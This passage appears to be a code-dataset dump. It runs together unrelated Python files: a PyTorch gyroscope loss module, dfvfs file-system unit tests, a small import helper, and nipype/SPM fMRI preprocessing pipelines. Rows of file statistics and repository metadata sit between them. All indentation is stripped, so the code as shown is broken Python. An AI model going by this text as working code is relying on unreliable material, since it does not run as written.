self.min_train_freq = 2 ** self.min_N
self.max_train_freq = 2 ** self.max_N
# sampling time
self.dt = params['train']['loss']['dt'] # (s)
# weights on loss
self.w = params['train']['loss']['w']
self.sl = torch.nn.SmoothL1Loss()
self.sln = torch.nn.SmoothL1Loss(reduction='none')
self.huber = params['train']['loss']['huber']
self.weight = torch.ones(1, 1, self.min_train_freq).cuda() / self.min_train_freq
self.N0 = 5 # remove first N0 increment in loss due not account padding
self.dv = params['train']['loss']['dv']
self.dv_normed = params['train']['loss']['dv_normed']
def f_huber(self, rs):
"""Huber loss function"""
loss = self.w * self.sl(rs/self.huber, torch.zeros_like(rs)) * (self.huber**2)
return loss
def gyro_loss(self, w_hat, dw_16):
"""Forward errors with rotation matrices"""
N = dw_16.shape[0]
drot_16 = SO3.exp(dw_16[:, ::self.min_train_freq].reshape(-1, 3).double())
dw_hat = self.dt * w_hat.reshape(-1, 3).double()
drot_hat = SO3.exp(dw_hat)
for k in range(self.min_N):
drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
rs = SO3.log(bmtm(drot_hat, drot_16)).reshape(N, -1, 3)[:, self.N0:]
gyro_loss_16 = self.f_huber(rs)
## compute increment from min_train_freq to max_train_freq
for k in range(self.min_N, self.max_N):
drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
drot_32 = drot_16[::2].bmm(drot_16[1::2])
rs = SO3.log(bmtm(drot_hat, drot_32)).reshape(N, -1, 3)[:, self.N0:]
gyro_loss_32 = self.f_huber(rs)/(2**(k - self.min_N + 1)) / 2.0
return gyro_loss_16, gyro_loss_32
def forward(self, w_hat, dw_16):
gyro16, gyro32 = self.gyro_loss(w_hat, dw_16)
return gyro16, gyro32
class DGLossVer2(torch.nn.Module):
"""Loss for low-frequency orientation increment"""
def __init__(self, params): # w, min_N, max_N, dt, huber
super().__init__()
# windows sizes
self.min_N = params['train']['loss']['min_N']
self.max_N = params['train']['loss']['max_N']
self.min_train_freq = 2 ** self.min_N
self.max_train_freq = 2 ** self.max_N
# sampling time
self.dt = params['train']['loss']['dt'] # (s)
# weights on loss
self.w = params['train']['loss']['w']
self.sl = torch.nn.SmoothL1Loss()
self.sln = torch.nn.SmoothL1Loss(reduction='none')
self.huber = params['train']['loss']['huber']
self.weight = torch.ones(1, 1, self.min_train_freq).cuda() / self.min_train_freq
self.N0 = 5 # remove first N0 increment in loss due not account padding
self.dv = params['train']['loss']['dv']
self.dv_normed = params['train']['loss']['dv_normed']
def f_huber(self, rs):
"""Huber loss function"""
loss = self.w * self.sl(rs/self.huber, torch.zeros_like(rs)) * (self.huber**2)
return loss
def gyro_loss(self, w_hat, dw_16):
"""Forward errors with rotation matrices"""
N = dw_16.shape[0]
drot_16 = SO3.exp(dw_16[:, ::self.min_train_freq].reshape(-1, 3).double())
dw_hat = self.dt * w_hat.reshape(-1, 3).double()
drot_hat = SO3.exp(dw_hat)
for k in range(self.min_N):
drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
rs = SO3.log(bmtm(drot_hat, drot_16)).reshape(N, -1, 3)[:, self.N0:]
gyro_loss_16 = self.f_huber(rs)
## compute increment from min_train_freq to max_train_freq
for k in range(self.min_N, self.max_N):
drot_hat = drot_hat[::2].bmm(drot_hat[1::2])
drot_32 = drot_16[::2].bmm(drot_16[1::2])
rs = SO3.log(bmtm(drot_hat, drot_32)).reshape(N, -1, 3)[:, self.N0:]
gyro_loss_32 = self.f_huber(rs)/(2**(k - self.min_N + 1)) / 2.0
return gyro_loss_16, gyro_loss_32
def gaussian_nll_loss(self, w_hat, w_gt, w_mean:torch.Tensor, w_std):
eps = 1e-6
w_var = w_std ** 2
w_var[w_var<eps] = eps
w_gap = w_gt - w_hat
w_mean = w_mean.unsqueeze(1).expand_as(w_gap)
w_var = w_var.unsqueeze(1).expand_as(w_gap)
# print('_first:', _first.shape)
# print('w_gap:', w_gap.shape)
# print('w_mean:', w_mean.shape)
# print('w_var:', w_var.shape)
_first = torch.log(w_var)
_second = (w_gap - w_mean)**2 / w_var
_loss = (_first + _second) / 2.0
return torch.mean(_loss)
def forward(self, w_hat, dw_16, w_gt, w_mean, w_std):
gyro16, gyro32 = self.gyro_loss(w_hat, dw_16)
gnll = self.gaussian_nll_loss(w_hat, w_gt, w_mean, w_std)
return gyro16, gyro32, gnll
| 37.671429
| 88
| 0.58722
| 824
| 5,274
| 3.512136
| 0.139563
| 0.043538
| 0.072564
| 0.044229
| 0.851071
| 0.851071
| 0.822046
| 0.807878
| 0.807878
| 0.785764
| 0
| 0.041455
| 0.254456
| 5,274
| 139
| 89
| 37.942446
| 0.694557
| 0.133485
| 0
| 0.755556
| 0
| 0
| 0.042478
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.044444
| 0
| 0.244444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6c95c0f01a97b574d1e9358ff0b1a256254b657c
| 5,726
|
py
|
Python
|
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
tests/file_io/modi_file_io.py
|
jaegeral/dfvfs
|
606d09bf4de0b5dcf20d1dddff879dfed5c93640
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the file-like object implementation using pymodi."""
import unittest
from dfvfs.file_io import hfs_file_io
from dfvfs.lib import definitions
from dfvfs.lib import errors
from dfvfs.path import factory as path_spec_factory
from tests.file_io import test_lib
class SparseImageMODIFileTest(test_lib.HFSImageFileTestCase):
"""Tests the MODI file-like object on a spare image file."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(SparseImageMODIFileTest, self).setUp()
test_path = self._GetTestFilePath(['hfsplus.sparseimage'])
self._SkipIfPathNotExists(test_path)
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
self._modi_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_MODI, parent=test_os_path_spec)
self._gpt_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_GPT, location='/p1',
parent=self._modi_path_spec)
def testOpenCloseIdentifier(self):
"""Test the open and close functionality using an identifier."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestOpenCloseIdentifier(file_object)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt',
parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestOpenCloseLocation(file_object)
# Try open with a path specification that has no parent.
path_spec.parent = None
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
with self.assertRaises(errors.PathSpecError):
self._TestOpenCloseLocation(file_object)
def testSeek(self):
"""Test the seek functionality."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_ANOTHER_FILE,
location='/a_directory/another_file', parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestSeek(file_object)
def testRead(self):
"""Test the read functionality."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt',
parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestRead(file_object)
class ZlibCompressedUDIFMODIFileTest(test_lib.HFSImageFileTestCase):
"""Tests the MODI file-like object on a zlib compressed UDIF image file."""
_IDENTIFIER_ANOTHER_FILE = 21
_IDENTIFIER_PASSWORDS_TXT = 23
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(ZlibCompressedUDIFMODIFileTest, self).setUp()
test_path = self._GetTestFilePath(['hfsplus_zlib.dmg'])
self._SkipIfPathNotExists(test_path)
test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_OS, location=test_path)
self._modi_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_MODI, parent=test_os_path_spec)
self._gpt_path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_GPT, location='/p1',
parent=self._modi_path_spec)
def testOpenCloseIdentifier(self):
"""Test the open and close functionality using an identifier."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestOpenCloseIdentifier(file_object)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt',
parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestOpenCloseLocation(file_object)
# Try open with a path specification that has no parent.
path_spec.parent = None
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
with self.assertRaises(errors.PathSpecError):
self._TestOpenCloseLocation(file_object)
def testSeek(self):
"""Test the seek functionality."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_ANOTHER_FILE,
location='/a_directory/another_file', parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestSeek(file_object)
def testRead(self):
"""Test the read functionality."""
path_spec = path_spec_factory.Factory.NewPathSpec(
definitions.TYPE_INDICATOR_HFS,
identifier=self._IDENTIFIER_PASSWORDS_TXT, location='/passwords.txt',
parent=self._gpt_path_spec)
file_object = hfs_file_io.HFSFile(self._resolver_context, path_spec)
self._TestRead(file_object)
if __name__ == '__main__':
unittest.main()
| 38.689189
| 78
| 0.759169
| 714
| 5,726
| 5.721289
| 0.137255
| 0.103794
| 0.05508
| 0.054835
| 0.880783
| 0.880783
| 0.880783
| 0.859731
| 0.859731
| 0.859731
| 0
| 0.001444
| 0.153336
| 5,726
| 147
| 79
| 38.952381
| 0.841172
| 0.137793
| 0
| 0.833333
| 0
| 0
| 0.031841
| 0.010271
| 0
| 0
| 0
| 0
| 0.020833
| 1
| 0.104167
| false
| 0.072917
| 0.0625
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
6cd472aee687cd88fb4aecc5ccc94e43c3230b8a
| 168
|
py
|
Python
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | 1
|
2022-03-01T02:36:29.000Z
|
2022-03-01T02:36:29.000Z
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | 1
|
2022-03-04T03:20:50.000Z
|
2022-03-04T03:20:50.000Z
|
Systerm/_setup.py
|
ZytroCode/Systerm
|
688b1a9eab51ec2d2fcc8e921d57ae4ae585a1b7
|
[
"MIT"
] | null | null | null |
"""Used to avoid circular import."""
def init_meta():
from Systerm import meta
return meta
def init_module():
from Systerm import module
return module
| 18.666667
| 36
| 0.696429
| 23
| 168
| 5
| 0.521739
| 0.121739
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22619
| 168
| 8
| 37
| 21
| 0.884615
| 0.178571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9f774fe70cbb89c385ead6bdd3738e32da3e8ebc
| 97,775
|
py
|
Python
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 13
|
2018-01-16T19:45:41.000Z
|
2021-12-31T11:38:28.000Z
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 15
|
2016-12-14T16:37:44.000Z
|
2020-05-04T17:32:21.000Z
|
cosanlab_preproc/pipelines.py
|
BryanGonzalez262/cosanlab_preproc
|
c6dad803178b608bf62758410c09d58657d08b81
|
[
"MIT"
] | 9
|
2017-08-16T18:16:03.000Z
|
2020-04-21T08:46:27.000Z
|
'''
Preproc Nipype Pipelines
========================
Various nipype pipelines
'''
__all__ = ['Couple_Preproc_Pipeline','TV_Preproc_Pipeline']
__author__ = ["Luke Chang"]
__license__ = "MIT"
from cosanlab_preproc.utils import get_n_slices, get_ta, get_slice_order, get_vox_dims
# def create_spm_preproc_func_pipeline(data_dir=None, subject_id=None, task_list=None):
#
# '''REQUIRES FIXS'''
# import nipype.interfaces.io as nio
# import nipype.interfaces.utility as util
# from nipype.pipeline.engine import Node, Workflow
# from nipype.interfaces.base import BaseInterface, TraitedSpec, File, traits
# import nipype.algorithms.rapidart as ra
# from nipype.interfaces import spm
# from nipype.interfaces.nipy.preprocess import ComputeMask
# import nipype.interfaces.matlab as mlab
# import os
# import nibabel as nib
# from IPython.display import Image
# import glob
# from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
#
# ###############################
# ## Set up Nodes
# ###############################
#
# ds = Node(nio.DataGrabber(infields=['subject_id', 'task_id'], outfields=['func', 'struc']),name='datasource')
# ds.inputs.base_directory = os.path.abspath(data_dir + '/' + subject_id)
# ds.inputs.template = '*'
# ds.inputs.sort_filelist = True
# ds.inputs.template_args = {'func': [['task_id']], 'struc':[]}
# ds.inputs.field_template = {'func': 'Functional/Raw/%s/func.nii','struc': 'Structural/SPGR/spgr.nii'}
# ds.inputs.subject_id = subject_id
# ds.inputs.task_id = task_list
# ds.iterables = ('task_id',task_list)
# # ds.run().outputs #show datafiles
#
# # #Setup Data Sinker for writing output files
# # datasink = Node(nio.DataSink(), name='sinker')
# # datasink.inputs.base_directory = '/path/to/output'
# # workflow.connect(realigner, 'realignment_parameters', datasink, 'motion.@par')
# # datasink.inputs.substitutions = [('_variable', 'variable'),('file_subject_', '')]
#
# #Get Timing Acquisition for slice timing
# tr = 2
# ta = Node(interface=util.Function(input_names=['tr', 'n_slices'], output_names=['ta'], function = get_ta), name="ta")
# ta.inputs.tr=tr
#
# #Slice Timing: sequential ascending
# slice_timing = Node(interface=spm.SliceTiming(), name="slice_timing")
# slice_timing.inputs.time_repetition = tr
# slice_timing.inputs.ref_slice = 1
#
# #Realignment - 6 parameters - realign to first image of very first series.
# realign = Node(interface=spm.Realign(), name="realign")
# realign.inputs.register_to_mean = True
#
# #Plot Realignment
# plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")
#
# #Artifact Detection
# art = Node(interface=ra.ArtifactDetect(), name="art")
# art.inputs.use_differences = [True,False]
# art.inputs.use_norm = True
# art.inputs.norm_threshold = 1
# art.inputs.zintensity_threshold = 3
# art.inputs.mask_type = 'file'
# art.inputs.parameter_source = 'SPM'
#
# #Coregister - 12 parameters, cost function = 'nmi', fwhm 7, interpolate, don't mask
# #anatomical to functional mean across all available data.
# coregister = Node(interface=spm.Coregister(), name="coregister")
# coregister.inputs.jobtype = 'estimate'
#
# # Segment structural, gray/white/csf,mni,
# segment = Node(interface=spm.Segment(), name="segment")
# segment.inputs.save_bias_corrected = True
#
# #Normalize - structural to MNI - then apply this to the coregistered functionals
# normalize = Node(interface=spm.Normalize(), name = "normalize")
# normalize.inputs.template = os.path.abspath(t1_template_file)
#
# #Plot normalization Check
# plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
# plot_normalization_check.inputs.canonical_img = canonical_file
#
# #Create Mask
# compute_mask = Node(interface=ComputeMask(), name="compute_mask")
# #remove lower 5% of histogram of mean image
# compute_mask.inputs.m = .05
#
# #Smooth
# #implicit masking (.im) = 0, dtype = 0
# smooth = Node(interface=spm.Smooth(), name = "smooth")
# fwhmlist = [0,5,8]
# smooth.iterables = ('fwhm',fwhmlist)
#
# #Create Covariate matrix
# make_covariates = Node(interface=Create_Covariates(), name="make_covariates")
#
# ###############################
# ## Create Pipeline
# ###############################
#
# Preprocessed = Workflow(name="Preprocessed")
# Preprocessed.base_dir = os.path.abspath(data_dir + '/' + subject_id + '/Functional')
#
# Preprocessed.connect([(ds, ta, [(('func', get_n_slices), "n_slices")]),
# (ta, slice_timing, [("ta", "time_acquisition")]),
# (ds, slice_timing, [('func', 'in_files'),
# (('func', get_n_slices), "num_slices"),
# (('func', get_slice_order), "slice_order"),
# ]),
# (slice_timing, realign, [('timecorrected_files', 'in_files')]),
# (realign, compute_mask, [('mean_image','mean_volume')]),
# (realign,coregister, [('mean_image', 'target')]),
# (ds,coregister, [('struc', 'source')]),
# (coregister,segment, [('coregistered_source', 'data')]),
# (segment, normalize, [('transformation_mat','parameter_file'),
# ('bias_corrected_image', 'source'),]),
# (realign,normalize, [('realigned_files', 'apply_to_files'),
# (('realigned_files', get_vox_dims), 'write_voxel_sizes')]),
# (normalize, smooth, [('normalized_files', 'in_files')]),
# (compute_mask,art,[('brain_mask','mask_file')]),
# (realign,art,[('realignment_parameters','realignment_parameters')]),
# (realign,art,[('realigned_files','realigned_files')]),
# (realign,plot_realign, [('realignment_parameters', 'realignment_parameters')]),
# (normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
# (realign, make_covariates, [('realignment_parameters', 'realignment_parameters')]),
# (art, make_covariates, [('outlier_files', 'spike_id')]),
# ])
# return Preprocessed
def Couple_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None, spm_path=None):
""" Create a preprocessing workflow for the Couples Conflict Study using nipype
Args:
base_dir: path to data folder where raw subject folder is located
output_dir: path to where key output files should be saved
subject_id: subject_id (str)
spm_path: path to spm folder
Returns:
workflow: a nipype workflow that can be run
"""
from nipype.interfaces.dcm2nii import Dcm2nii
from nipype.interfaces.fsl import Merge, TOPUP, ApplyTOPUP
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.utility import Merge as Merge_List
from nipype.pipeline.engine import Node, Workflow
from nipype.interfaces.fsl.maths import UnaryMaths
from nipype.interfaces.nipy.preprocess import Trim
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces import spm
from nipype.interfaces.spm import Normalize12
from nipype.algorithms.misc import Gunzip
from nipype.interfaces.nipy.preprocess import ComputeMask
import nipype.interfaces.matlab as mlab
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates
from cosanlab_preproc.utils import get_resource_path, get_vox_dims, get_n_volumes
import os
import glob
########################################
## Setup Paths and Nodes
########################################
# Specify Paths
canonical_file = os.path.join(spm_path,'canonical','single_subj_T1.nii')
template_file = os.path.join(spm_path,'tpm','TPM.nii')
# Set the way matlab should be called
mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
mlab.MatlabCommand.set_default_paths(spm_path)
# Get File Names for different types of scans. Parse into separate processing streams
datasource = Node(interface=nio.DataGrabber(infields=['subject_id'], outfields=['struct', 'ap', 'pa']),name='datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.template = '*'
datasource.inputs.field_template = {'struct':'%s/Study*/t1w_32ch_mpr_08mm*',
'ap':'%s/Study*/distortion_corr_32ch_ap*',
'pa':'%s/Study*/distortion_corr_32ch_pa*'}
datasource.inputs.template_args = {'struct':[['subject_id']],'ap':[['subject_id']],'pa':[['subject_id']]}
datasource.inputs.subject_id = subject_id
datasource.inputs.sort_filelist=True
# iterate over functional scans to define paths
scan_file_list = glob.glob(os.path.join(base_dir,subject_id,'Study*','*'))
func_list = [s for s in scan_file_list if "romcon_ap_32ch_mb8" in s]
func_list = [s for s in func_list if "SBRef" not in s] # Exclude sbref for now.
func_source = Node(interface=util.IdentityInterface(fields=['scan']),name="func_source")
func_source.iterables = ('scan', func_list)
# Create Separate Converter Nodes for each different type of file. (dist corr scans need to be done before functional)
ap_dcm2nii = Node(interface = Dcm2nii(),name='ap_dcm2nii')
ap_dcm2nii.inputs.gzip_output = True
ap_dcm2nii.inputs.output_dir = '.'
ap_dcm2nii.inputs.date_in_filename = False
pa_dcm2nii = Node(interface = Dcm2nii(),name='pa_dcm2nii')
pa_dcm2nii.inputs.gzip_output = True
pa_dcm2nii.inputs.output_dir = '.'
pa_dcm2nii.inputs.date_in_filename = False
f_dcm2nii = Node(interface = Dcm2nii(),name='f_dcm2nii')
f_dcm2nii.inputs.gzip_output = True
f_dcm2nii.inputs.output_dir = '.'
f_dcm2nii.inputs.date_in_filename = False
s_dcm2nii = Node(interface = Dcm2nii(),name='s_dcm2nii')
s_dcm2nii.inputs.gzip_output = True
s_dcm2nii.inputs.output_dir = '.'
s_dcm2nii.inputs.date_in_filename = False
########################################
## Setup Nodes for distortion correction
########################################
# merge output files into list
merge_to_file_list = Node(interface=Merge_List(2), infields=['in1','in2'], name='merge_to_file_list')
# fsl merge AP + PA files (depends on direction)
merger = Node(interface=Merge(dimension = 't'),name='merger')
merger.inputs.output_type = 'NIFTI_GZ'
# use topup to create distortion correction map
topup = Node(interface=TOPUP(), name='topup')
topup.inputs.encoding_file = os.path.join(get_resource_path(),'epi_params_APPA_MB8.txt')
topup.inputs.output_type = "NIFTI_GZ"
topup.inputs.config = 'b02b0.cnf'
# apply topup to all functional images
apply_topup = Node(interface = ApplyTOPUP(), name='apply_topup')
apply_topup.inputs.in_index = [1]
apply_topup.inputs.encoding_file = os.path.join(get_resource_path(),'epi_params_APPA_MB8.txt')
apply_topup.inputs.output_type = "NIFTI_GZ"
apply_topup.inputs.method = 'jac'
apply_topup.inputs.interp = 'spline'
# Clear out Zeros from spline interpolation using absolute value.
abs_maths = Node(interface=UnaryMaths(), name='abs_maths')
abs_maths.inputs.operation = 'abs'
########################################
## Preprocessing
########################################
# Trim - remove first 10 TRs
n_vols = 10
trim = Node(interface = Trim(), name='trim')
trim.inputs.begin_index=n_vols
#Realignment - 6 parameters - realign to first image of very first series.
realign = Node(interface=spm.Realign(), name="realign")
realign.inputs.register_to_mean = True
#Coregister - 12 parameters
coregister = Node(interface=spm.Coregister(), name="coregister")
coregister.inputs.jobtype = 'estwrite'
#Plot Realignment
plot_realign = Node(interface=Plot_Realignment_Parameters(), name="plot_realign")
#Artifact Detection
art = Node(interface=ArtifactDetect(), name="art")
art.inputs.use_differences = [True,False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'SPM'
# Gunzip - unzip the functional and structural images
gunzip_struc = Node(Gunzip(), name="gunzip_struc")
gunzip_func = Node(Gunzip(), name="gunzip_func")
# Normalize - normalizes functional and structural images to the MNI template
normalize = Node(interface=Normalize12(jobtype='estwrite',tpm=template_file),
name="normalize")
#Plot normalization Check
plot_normalization_check = Node(interface=Plot_Coregistration_Montage(), name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = canonical_file
#Plot QA
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
#Create Mask
compute_mask = Node(interface=ComputeMask(), name="compute_mask")
#remove lower 5% of histogram of mean image
compute_mask.inputs.m = .05
#Smooth
#implicit masking (.im) = 0, dtype = 0
smooth = Node(interface=spm.Smooth(), name = "smooth")
smooth.inputs.fwhm=6
#Create Covariate matrix
make_cov = Node(interface=Create_Covariates(), name="make_cov")
# Create a datasink to clean up output files
datasink = Node(interface=nio.DataSink(), name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
########################################
# Create Workflow
########################################
workflow = Workflow(name = 'Preprocessed')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([(datasource, ap_dcm2nii,[('ap','source_dir')]),
(datasource, pa_dcm2nii,[('pa','source_dir')]),
(datasource, s_dcm2nii,[('struct','source_dir')]),
(func_source, f_dcm2nii,[('scan','source_dir')]),
(ap_dcm2nii, merge_to_file_list,[('converted_files','in1')]),
(pa_dcm2nii, merge_to_file_list,[('converted_files','in2')]),
(merge_to_file_list, merger,[('out','in_files')]),
(merger, topup,[('merged_file','in_file')]),
(topup, apply_topup,[('out_fieldcoef','in_topup_fieldcoef'),
('out_movpar','in_topup_movpar')]),
(f_dcm2nii, trim,[('converted_files','in_file')]),
(trim, apply_topup,[('out_file','in_files')]),
(apply_topup, abs_maths,[('out_corrected','in_file')]),
(abs_maths, gunzip_func, [('out_file', 'in_file')]),
(gunzip_func, realign, [('out_file', 'in_files')]),
(s_dcm2nii, gunzip_struc,[('converted_files','in_file')]),
(gunzip_struc,coregister, [('out_file', 'source')]),
(coregister, normalize,[('coregistered_source','image_to_align')]),
(realign, plot_qa, [('realigned_files','dat_img')]),
(realign,coregister, [('mean_image', 'target'),
('realigned_files', 'apply_to_files')]),
(realign,normalize, [(('mean_image', get_vox_dims), 'write_voxel_sizes')]),
(coregister,normalize, [('coregistered_files', 'apply_to_files')]),
(normalize, smooth, [('normalized_files', 'in_files')]),
(realign, compute_mask, [('mean_image','mean_volume')]),
(compute_mask,art,[('brain_mask','mask_file')]),
(realign,art,[('realignment_parameters','realignment_parameters'),
('realigned_files','realigned_files')]),
(realign,plot_realign, [('realignment_parameters', 'realignment_parameters')]),
(normalize, plot_normalization_check, [('normalized_files', 'wra_img')]),
(realign, make_cov, [('realignment_parameters', 'realignment_parameters')]),
(art, make_cov, [('outlier_files', 'spike_id')]),
(normalize, datasink, [('normalized_files', 'structural.@normalize')]),
(coregister, datasink, [('coregistered_source', 'structural.@struct')]),
(topup, datasink, [('out_fieldcoef', 'distortion.@fieldcoef')]),
(topup, datasink, [('out_movpar', 'distortion.@movpar')]),
(smooth, datasink, [('smoothed_files', 'functional.@smooth')]),
(plot_realign, datasink, [('plot', 'functional.@plot_realign')]),
(plot_normalization_check, datasink, [('plot', 'functional.@plot_normalization')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(make_cov, datasink, [('covariates', 'functional.@covariates')])])
return workflow
def TV_Preproc_Pipeline_OLD(base_dir=None, output_dir=None, subject_id=None, spm_path=None):
""" Create a preprocessing workflow for the Couples Conflict Study using nipype
Args:
base_dir: path to data folder where raw subject folder is located
output_dir: path to where key output files should be saved
subject_id: subject_id (str)
spm_path: path to spm folder
Returns:
workflow: a nipype workflow that can be run
"""
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from nipype.interfaces.utility import Merge as Merge_List
from nipype.pipeline.engine import Node, Workflow
from nipype.interfaces.fsl.maths import UnaryMaths
from nipype.interfaces.nipy.preprocess import Trim
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces import spm
from nipype.interfaces.spm import Normalize12
from nipype.algorithms.misc import Gunzip
from nipype.interfaces.nipy.preprocess import ComputeMask
import nipype.interfaces.matlab as mlab
from cosanlab_preproc.utils import get_resource_path, get_vox_dims, get_n_volumes
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Realignment_Parameters, Create_Covariates, Plot_Quality_Control
import os
import glob
########################################
## Setup Paths and Nodes
########################################
# Specify Paths
canonical_file = os.path.join(spm_path,'canonical','single_subj_T1.nii')
template_file = os.path.join(spm_path,'tpm','TPM.nii')
# Set the way matlab should be called
mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
mlab.MatlabCommand.set_default_paths(spm_path)
# Get File Names for different types of scans. Parse into separate processing streams
datasource = Node(interface=nio.DataGrabber(infields=['subject_id'], outfields=[
'struct', 'func']),name='datasource')
datasource.inputs.base_directory = base_dir
datasource.inputs.template = '*'
datasource.inputs.field_template = {'struct':'%s/T1.nii.gz',
'func':'%s/*ep*.nii.gz'}
datasource.inputs.template_args = {'struct':[['subject_id']],
'func':[['subject_id']]}
datasource.inputs.subject_id = subject_id
datasource.inputs.sort_filelist=True
# iterate over functional scans to define paths
func_source = Node(interface=util.IdentityInterface(fields=['scan']),name="func_source")
func_source.iterables = ('scan', glob.glob(os.path.join(base_dir,subject_id,'*ep*nii.gz')))
########################################
## Preprocessing
########################################
# Trim - remove first 5 TRs
n_vols = 5
trim = Node(interface = Trim(), name='trim')
trim.inputs.begin_index=n_vols
#Realignment - 6 parameters - realign to first image of very first series.
